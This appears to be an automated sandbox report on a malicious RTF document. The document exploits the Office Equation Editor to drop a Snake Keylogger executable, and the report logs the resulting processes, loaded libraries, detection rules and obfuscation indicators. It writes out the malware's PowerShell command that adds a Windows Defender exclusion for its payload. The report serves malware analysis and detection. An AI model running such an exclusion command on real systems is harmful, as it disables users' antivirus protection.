                Source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Xkl0PnD8zFPjfh1[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wealthcharliebgk.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, V2NTuI83GISjPPYVRb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, V2NTuI83GISjPPYVRb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@9/14@29/8
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$l0PnD8zFPjfh1.wiz.rtfJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7B47.tmpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........+.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.T........,.........................s.................... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T.......-,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T.......9,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....K,.........................s....................$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T.......Y,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T.......k,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T.......w,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........,.........................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................T........,.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................T........,.........................s............................................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Xkl0PnD8zFPjfh1.wiz.rtfReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: Xkl0PnD8zFPjfh1.wiz.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Xkl0PnD8zFPjfh1.wiz.rtf
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.cs.Net Code: mKLRMTo664 System.Reflection.Assembly.Load(byte[])
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.cs.Net Code: mKLRMTo664 System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065C264 pushad ; retn 0065h2_2_0065C289
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0064F962 push ss; retf 2_2_0064F968
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065E170 push eax; retf 2_2_0065E171
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0066574A push esp; ret 2_2_0066574B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00665752 push esp; ret 2_2_00665753
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0064F724 push D1366233h; retf 2_2_0064F74B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00665022 push ebp; ret 2_2_00665023
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065C333 push A00065C4h; ret 2_2_0065C3F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00665000 push ebp; ret 2_2_0066501B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065C2DC pushad ; retn 0065h2_2_0065C2DD
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065C3A4 push A00065C4h; ret 2_2_0065C3F5
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C90F8 pushfd ; retn 0046h8_2_005C90F9
                Source: Xkl0PnD8zFPjfh1[1].exe.2.drStatic PE information: section name: .text entropy: 7.973674679301799
                Source: wealthcharliebgk.exe.2.drStatic PE information: section name: .text entropy: 7.973674679301799
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, dtKeGNeVNY8RE0vBLA.csHigh entropy of concatenated method names: 'NCCXBDr1Lk', 'GsaXHlCImj', 'jgsdv2ZobI', 'WLTdU9tW1B', 'fDIdTE5vCY', 'BVGdbDMEE5', 'TIld38ILKS', 'ffMdglfbo9', 'SNedudLgmD', 'it8dismJma'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, PALlVQORW7VbmF9ELo2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QfYyW0OLg1', 'islyQJWCQZ', 'UYoyxjv3Dk', 'tbkyykd0lb', 'M4Ry9G0X04', 'OUCy1JQtVc', 'nCSykwpQ38'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, shKIYL39keTC3Y0mTs.csHigh entropy of concatenated method names: 'vNusmGijIA', 'SQGsd51ABP', 'YsYsqv1A2r', 'lcsq5y7Dtk', 'gTIqz7GxQy', 'lmssI8i491', 'TZAsOFIYq5', 'M5Ms0KkVQN', 'x9esrBqSlK', 'XZCsRtwWyF'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, Y9KY4VzA2jSZGjyJ6P.csHigh entropy of concatenated method names: 'y9CQZPUJN5', 'mWEQ8sUZTp', 'vZQQSGeFPa', 'z5cQwsiy1k', 'RhnQJheFej', 'mkAQUeygpt', 'OM0QTxq1Uj', 'pn0QkBOwXe', 'pcvQcm3BpI', 'CZSQhd0fKJ'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, nkHJY90Brlbmc3kJEC.csHigh entropy of concatenated method names: 'uM4MuIw1K', 'Wlw7U6puD', 'Cd2ZGtAuR', 'pA6H8yZi7', 'kRCS4Fp9c', 'KQpeB3clT', 'lNCgVNQY0iNENvl7vo', 'cyAvS1ypWUKRpjvLYc', 'Tt944IDf6', 'PnXQbbPMZ'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, utJNlJw8vFTN1VgkyR.csHigh entropy of concatenated method names: 'qc3q636cx2', 'n6lqGhk3xk', 'gJqqXYJilr', 'd8WqsxT8Pj', 'C96qFmwF3n', 'fwbXDs2pJu', 'LXYXKcMK2K', 'g11XLbuL4u', 'G5mXaoQSxa', 'HXwXnETDi1'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, SAoJvXKICZmdm4r4AF.csHigh entropy of concatenated method names: 'hpZAadklxE', 'tmyA5WIdBu', 'FxE4Irmj2k', 'JQ54Ol3ve2', 'ut2ApfZukn', 'jdHACKnD4U', 'BPUA26Ibxt', 's0hAoB7TTo', 'YhhAfDlpYG', 'zywAPMG304'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, wSOUBVSC5696JmBYr5.csHigh entropy of concatenated method names: 'FI1d7urVHJ', 'GkydZoYHEx', 'eGJd8J1Yi9', 'cCKdSAmoCe', 'bIddYd4Amr', 'fLtdVoPq5M', 'cuEdAETcaj', 'Mppd4IVTUU', 'VBUdWICpEO', 'FKpdQVC7K9'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, WSgky6napDcSfTsQu0.csHigh entropy of concatenated method names: 'DhXWwuDBl2', 'nosWJoT5O5', 'tYxWvBn50b', 'DWMWUucuyH', 'Ux6WTrfE4I', 'Eb2WbxEK5G', 'YeVW3g1lGx', 'FvfWgyXV2B', 'pBDWuaMmFk', 'juPWiUyi0f'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, Q8MD4kJhk2Qpfin5Ab.csHigh entropy of concatenated method names: 'Bameic9GA5CM8L0sFxU', 'lLPrdM9Ffwvo6O2x5c0', 'MkOq4XVPt7', 'CSUqWSRqOp', 'QJMqQdX5l3', 'K6yd3e9g2bn1Et02Mx3', 'YUiMVB9mpDrg1H7Eryh'
